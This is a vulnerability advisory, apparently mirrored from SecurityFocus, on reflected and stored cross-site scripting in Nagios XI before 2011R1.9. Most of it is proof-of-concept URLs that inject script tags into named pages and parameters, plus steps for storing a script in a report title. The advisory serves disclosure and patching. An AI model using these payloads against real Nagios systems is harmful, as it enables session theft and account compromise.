扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 |
source: www.securityfocus.com/bid/51069/info Nagios XI is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Nagios XI versions prior to 2011R1.9 are vulnerable. Reflected XSS ----- Page: /nagiosxi/login.php Variables: - PoCs: http://site/nagiosxi/login.php/";alert('0a29');" Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe manner Also affects: /nagiosxi/about/index.php /nagiosxi/about/index.php /nagiosxi/about/main.php /nagiosxi/account/main.php /nagiosxi/account/notifymethods.php /nagiosxi/account/notifymsgs.php /nagiosxi/account/notifyprefs.php /nagiosxi/account/testnotification.php /nagiosxi/help/index.php /nagiosxi/help/main.php /nagiosxi/includes/components/alertstream/go.php /nagiosxi/includes/components/alertstream/index.php /nagiosxi/includes/components/hypermap_replay/index.php /nagiosxi/includes/components/massacknowledge/mass_ack.php /nagiosxi/includes/components/xicore/recurringdowntime.php/ /nagiosxi/includes/components/xicore/status.php /nagiosxi/includes/components/xicore/tac.php /nagiosxi/reports/alertheatmap.php /nagiosxi/reports/availability.php /nagiosxi/reports/eventlog.php /nagiosxi/reports/histogram.php /nagiosxi/reports/index.php /nagiosxi/reports/myreports.php /nagiosxi/reports/nagioscorereports.php /nagiosxi/reports/notifications.php /nagiosxi/reports/statehistory.php /nagiosxi/reports/topalertproducers.php /nagiosxi/views/index.php /nagiosxi/views/main.php Page: /nagiosxi/account/ Variables: xiwindow PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script> Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php Variables: - PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script> Page: /nagiosxi/includes/components/xicore/status.php Variables: hostgroup, style PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script> http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script> Page: /nagiosxi/includes/components/xicore/recurringdowntime.php Variables: - PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script> Page: /nagiosxi/reports/alertheatmap.php Variables: height, host, service, width PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script> http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script> http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script> http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script> Page: /nagiosxi/reports/histogram.php Variable: service PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script> Page: /nagiosxi/reports/notifications.php Variables: host, service PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script> http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script> Page: /nagiosxi/reports/statehistory.php Variables: host, service PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script> http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script> Stored XSS ----- Page: /nagiosxi/reports/myreports.php Variable: title Details: It is possible to store XSS within 'My Reports', however it is believed this is only viewable by the logged-in user. 1) View a report and save it, e.g. http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D 2) Name the report with XSS, e.g. "><script>alert("0a29")</script> |
体验盒子
